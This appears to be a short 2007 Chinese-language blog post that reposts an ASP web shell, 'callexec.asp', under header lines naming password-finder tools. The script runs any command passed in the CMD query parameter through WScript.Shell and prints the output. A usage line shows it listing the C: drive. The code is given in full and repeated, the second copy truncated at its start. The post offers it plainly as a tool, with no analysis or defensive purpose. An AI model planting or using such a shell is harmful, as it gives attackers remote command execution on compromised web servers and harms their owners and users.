Windows Live Messenger v8 Password Finder 
FirePassword 
May 4, 2007 11:05 | by
PS:在国外的站点上看到的..
usage: callexec.asp?CMD=dir+c:\
usage: callexec.asp?CMD=dir+c:\
<%
Set FileSys = Server.CreateObject("Scripting.FileSystemObject")
FileName = FileSys.GetTempName
Set WShShell = Server.CreateObject("WScript.Shell")
If Request.QueryString("CMD") <> "" Then
Set CMD = Request.QueryString("CMD")
CMD = Trim(CMD) & " > TmpFile.txt"
Response.Write("Executing " & CMD & "<BR>")
RetCode = WShShell.Run(CMD, 1, True)
if RetCode = 0 Then
Set TextFile = FileSys.OpenTextFile("TmpFile.txt", 1)
TextBuffer = TextFile.ReadAll
Response.Write("<PLAINTEXT>")
For i = 1 to Len(TextBuffer)
Response.Write(Mid(TextBuffer,i,1))
Next
Response.Write("</PLAINTEXT>")
TextFile.Close
FileSys.DeleteFile "TmpFile.txt"
else
%> There were errors. <%
end if
Else
%> ASP requires GET w/ "CMD=" <%
End If
%>
Set FileSys = Server.CreateObject("Scripting.FileSystemObject")
FileName = FileSys.GetTempName
Set WShShell = Server.CreateObject("WScript.Shell")
If Request.QueryString("CMD") <> "" Then
Set CMD = Request.QueryString("CMD")
CMD = Trim(CMD) & " > TmpFile.txt"
Response.Write("Executing " & CMD & "<BR>")
RetCode = WShShell.Run(CMD, 1, True)
if RetCode = 0 Then
Set TextFile = FileSys.OpenTextFile("TmpFile.txt", 1)
TextBuffer = TextFile.ReadAll
Response.Write("<PLAINTEXT>")
For i = 1 to Len(TextBuffer)
Response.Write(Mid(TextBuffer,i,1))
Next
Response.Write("</PLAINTEXT>")
TextFile.Close
FileSys.DeleteFile "TmpFile.txt"
else
%> There were errors. <%
end if
Else
%> ASP requires GET w/ "CMD=" <%
End If
%>
